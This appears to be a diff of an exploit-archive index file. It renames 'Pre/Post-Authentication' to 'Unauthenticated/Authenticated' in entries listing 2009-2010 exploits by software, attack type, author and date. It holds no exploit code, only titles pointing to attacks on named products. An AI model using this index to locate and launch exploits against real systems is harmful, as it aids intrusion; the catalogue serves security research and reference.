-8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 +8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0 @@ -7619,7 +7618,7 @@ id,file,description,date,author,platform,type,port 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0 -8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Pre-Authentication",2009-02-23,ahmadbady,php,webapps,0 +8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 @@ -7706,7 +7705,7 @@ id,file,description,date,author,platform,type,port 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0 -8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Authentication Denial of Service",2009-03-09,h00die,hardware,dos,0 +8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 @@ -7729,7 +7728,7 @@ id,file,description,date,author,platform,type,port 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 -8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 +8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 @@ -7760,7 +7759,7 @@ id,file,description,date,author,platform,type,port 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0 -8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Post-Authentication) Command Execution",2009-03-19,"Emory University",cgi,webapps,0 +8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 @@ -7786,7 +7785,7 @@ id,file,description,date,author,platform,type,port 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0 -8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 +8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 @@ -7796,7 +7795,7 @@ id,file,description,date,author,platform,type,port 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 -8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 +8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0 @@ -7862,7 +7861,7 @@ id,file,description,date,author,platform,type,port 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 -8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution",2009-04-03,brain[pillow],php,webapps,0 +8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 @@ -7978,7 +7977,7 @@ id,file,description,date,author,platform,type,port 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 -8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0 +8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Buffer Overflow",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 @@ -7999,7 +7998,7 @@ id,file,description,date,author,platform,type,port 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 -8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service",2009-04-20,h00die,hardware,dos,0 +8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 @@ -8526,7 +8525,7 @@ id,file,description,date,author,platform,type,port 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 -9039,platforms/multiple/remote/9039.txt,"Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 +9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0 @@ -8569,7 +8568,7 @@ id,file,description,date,author,platform,type,port 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0 -9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 +9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 @@ -8909,7 +8908,7 @@ id,file,description,date,author,platform,type,port 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0 -9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal",2009-08-18,DSecRG,windows,remote,0 +9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 @@ -9125,7 +9124,7 @@ id,file,description,date,author,platform,type,port 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 -9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 +9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 @@ -9147,7 +9146,7 @@ id,file,description,date,author,platform,type,port 9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0 -9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Post-Authentication) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 +9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0 @@ -9306,7 +9305,7 @@ id,file,description,date,author,platform,type,port 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute",2009-07-22,spinbad,php,webapps,0 +9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution",2009-07-22,spinbad,php,webapps,0 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 @@ -9372,7 +9371,7 @@ id,file,description,date,author,platform,type,port 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 -9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 +9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote,0 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 @@ -9672,7 +9671,7 @@ id,file,description,date,author,platform,type,port 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 -10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 +10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0 @@ -10149,7 +10148,7 @@ id,file,description,date,author,platform,type,port 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 -11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 +11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0 @@ -10399,7 +10398,7 @@ id,file,description,date,author,platform,type,port 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos,0 -11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0 +11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0 11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,"HackXBack ",php,webapps,0 11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 @@ -10437,7 +10436,7 @@ id,file,description,date,author,platform,type,port 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions - Multiple SQL Injections",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 (Windows XP SP3) - PLS PLA Exploit",2010-02-10,"Beenu Arora",windows,local,0 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps,0 -11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0 +11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)",2010-02-10,loneferret,windows,dos,0 11392,platforms/windows/dos/11392.c,"RadASM 2.2.1.6 - '.rap' Local Buffer Overflow (PoC)",2010-02-11,"fl0 fl0w",windows,dos,0 11393,platforms/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,jsp,webapps,0 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0 @@ -10463,7 +10462,7 @@ id,file,description,date,author,platform,type,port 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - (Remote File Inclusion / Local File Inclusion) Multiple Include",2010-02-12,"cr4wl3r ",php,webapps,0 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,php,webapps,0 -11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0 +11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit",2010-02-12,Lincoln,windows,remote,0 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 11425,platforms/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,php,webapps,0 @@ -10502,9 +10501,9 @@ id,file,description,date,author,platform,type,port 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0 -11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2010-02-15,dookie,windows,remote,21 -11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 -11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 +11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21 +11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 +11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 @@ -10733,16 +10732,16 @@ id,file,description,date,author,platform,type,port 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,php,webapps,0 11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps,0 11733,platforms/php/webapps/11733.txt,"PHPpool media Domain Verkaufs und Auktions Portal - 'index.php' SQL Injection",2010-03-14,"Easy Laster",php,webapps,0 -11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0 +11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0 